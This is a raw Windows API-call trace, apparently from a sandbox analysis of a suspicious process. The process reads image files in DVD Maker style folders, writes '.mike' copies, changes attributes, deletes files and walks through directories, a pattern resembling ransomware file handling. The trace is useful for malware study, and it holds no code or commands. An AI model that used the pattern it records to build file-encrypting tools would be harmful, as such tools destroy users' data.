CloseHandle (hObject=0x288) returned 1 [0066.224] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0066.224] ReadFile (in: hFile=0x288, lpBuffer=0x20fd6d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x20fd6d8*, lpNumberOfBytesRead=0x2af080*=0xc09, lpOverlapped=0x0) returned 1 [0066.225] CloseHandle (hObject=0x288) returned 1 [0066.226] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_SelectionSubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_SelectionSubpicture.png.mike", lpFilePart=0x0) returned 0x5e [0066.226] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0066.226] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0066.226] WriteFile (in: hFile=0x288, lpBuffer=0x2104e20*, nNumberOfBytesToWrite=0xc10, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2104e20*, lpNumberOfBytesWritten=0x2af074*=0xc10, lpOverlapped=0x0) returned 1 [0066.226] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0066.226] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0066.227] WriteFile (in: hFile=0x288, lpBuffer=0x21080a0*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x21080a0*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0066.228] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_SelectionSubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_SelectionSubpicture.png.mike", lpFilePart=0x0) returned 0x5e [0066.228] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0066.228] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0066.228] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_SelectionSubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_SelectionSubpicture.png.mike", lpFilePart=0x0) returned 0x5e [0066.228] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0066.228] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0066.228] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0066.229] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_SelectionSubpicture.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_SelectionSubpicture.png", lpFilePart=0x0) returned 0x59 [0066.229] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_SelectionSubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_SelectionSubpicture.png.mike", lpFilePart=0x0) returned 0x5e [0066.229] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0066.229] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0066.230] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_SelectionSubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_SelectionSubpicture.png.mike", lpFilePart=0x0) returned 0x5e [0066.230] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_SelectionSubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\navigationup_selectionsubpicture.png.mike")) returned 1 [0066.231] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0066.232] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0066.232] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\photograph.png", nBufferLength=0x105, lpBuffer=0x2aeb18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\photograph.png", lpFilePart=0x0) returned 0x43 [0066.232] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0066.232] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0066.232] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0066.232] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0066.232] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0066.233] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0066.233] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0066.233] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0066.233] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0066.233] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\photograph.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\photograph.png.mike", lpFilePart=0x0) returned 0x48 [0066.233] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0066.233] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0066.233] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\photograph.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\photograph.png", lpFilePart=0x0) returned 0x43 [0066.233] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0066.233] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0066.233] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0066.234] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0066.234] WriteFile (in: hFile=0x288, lpBuffer=0x210d2c8*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x210d2c8*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0066.235] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0066.235] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0066.235] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0066.235] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0066.235] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0066.238] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\photograph.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\photograph.png.mike", lpFilePart=0x0) returned 0x48 [0066.238] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0066.238] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0066.238] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0066.238] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0066.238] SetFilePointer (in: hFile=0x288, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2800 [0066.239] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\photograph.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\photograph.png.mike", lpFilePart=0x0) returned 0x48 [0066.239] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0066.239] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0066.240] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0066.240] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0066.240] SetFilePointer (in: hFile=0x288, lDistanceToMove=20480, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x5000 [0066.240] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\photograph.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\photograph.png.mike", lpFilePart=0x0) returned 0x48 [0066.240] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0066.240] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0066.241] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0066.241] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0066.242] WriteFile (in: hFile=0x288, lpBuffer=0x213395c*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x213395c*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0066.242] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\photograph.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\photograph.png.mike", lpFilePart=0x0) returned 0x48 [0066.242] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0066.242] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0066.242] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\photograph.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\photograph.png.mike", lpFilePart=0x0) returned 0x48 [0066.243] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0066.243] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0066.243] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\photograph.png", dwFileAttributes=0x80) returned 0 [0066.244] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\photograph.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\photograph.png", lpFilePart=0x0) returned 0x43 [0066.244] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\photograph.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\photograph.png.mike", lpFilePart=0x0) returned 0x48 [0066.244] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0066.244] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0066.244] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\photograph.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\photograph.png.mike", lpFilePart=0x0) returned 0x48 [0066.244] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\photograph.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\photograph.png.mike")) returned 1 [0066.245] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0066.245] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa198102e, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xf0c50620, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xf0c76780, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0066.246] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa198102e, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xf0c50620, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xf0c76780, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.246] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f740a33, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f740a33, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x540920df, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11da, dwReserved0=0x0, dwReserved1=0x0, cFileName="1047x576black.png", cAlternateFileName="")) returned 1 [0066.246] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f71a8d6, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f71a8d6, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5396df3f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1928, dwReserved0=0x0, dwReserved1=0x0, cFileName="1047x576_91n92.png", cAlternateFileName="")) returned 1 [0066.246] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f6ce61c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f6ce61c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x544241af, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb05, dwReserved0=0x0, dwReserved1=0x0, cFileName="15x15dot.png", cAlternateFileName="")) returned 1 [0066.246] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f740a33, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f740a33, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5444a30d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x15f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="720x480icongraphic.png", cAlternateFileName="")) returned 1 [0066.246] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f6ce61c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f6ce61c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5444a30d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x143e, dwReserved0=0x0, dwReserved1=0x0, cFileName="720_480shadow.png", cAlternateFileName="")) returned 1 [0066.247] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f7ff104, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f7ff104, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x54613375, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationLeft_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0066.247] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f7b2e4a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f7b2e4a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x54e68005, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc3a, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationLeft_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0066.247] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f7d8fa7, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f7d8fa7, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x54f98af5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationRight_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0066.247] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f78cced, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f78cced, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5529264d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2e, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationRight_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0066.247] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f766b90, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f766b90, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5529264d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x135b, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationUp_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0066.247] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f7b2e4a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f7b2e4a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x552b87ab, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationUp_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0066.247] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f6a84bf, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f6a84bf, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x552b87ab, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x60d7, dwReserved0=0x0, dwReserved1=0x0, cFileName="photograph.png", cAlternateFileName="")) returned 1 [0066.248] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f6a84bf, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f6a84bf, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x552b87ab, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x60d7, dwReserved0=0x0, dwReserved1=0x0, cFileName="photograph.png", cAlternateFileName="")) returned 0 [0066.248] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0066.248] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0066.248] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0066.248] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0066.248] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0066.248] CoTaskMemFree (pv=0x506980) [0066.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0066.248] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel", lpFilePart=0x0) returned 0x32 [0066.248] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0066.248] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa108fe2a, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa8b92dd, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa11287e6, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0066.250] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa108fe2a, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa8b92dd, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa11287e6, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.250] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x726438ff, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x726438ff, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x552b87ab, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x701d, dwReserved0=0x0, dwReserved1=0x0, cFileName="16_9-frame-background.png", cAlternateFileName="")) returned 1 [0066.250] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x726438ff, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x726438ff, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x552b87ab, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x609, dwReserved0=0x0, dwReserved1=0x0, cFileName="16_9-frame-highlight.png", cAlternateFileName="")) returned 1 [0066.250] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72669a5c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72669a5c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x553c313d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc57, dwReserved0=0x0, dwReserved1=0x0, cFileName="16_9-frame-image-inset.png", cAlternateFileName="")) returned 1 [0066.251] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7268fbb9, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7268fbb9, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x553e929b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x213d, dwReserved0=0x0, dwReserved1=0x0, cFileName="btn-back-static.png", cAlternateFileName="")) returned 1 [0066.251] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7268fbb9, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7268fbb9, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x553e929b, 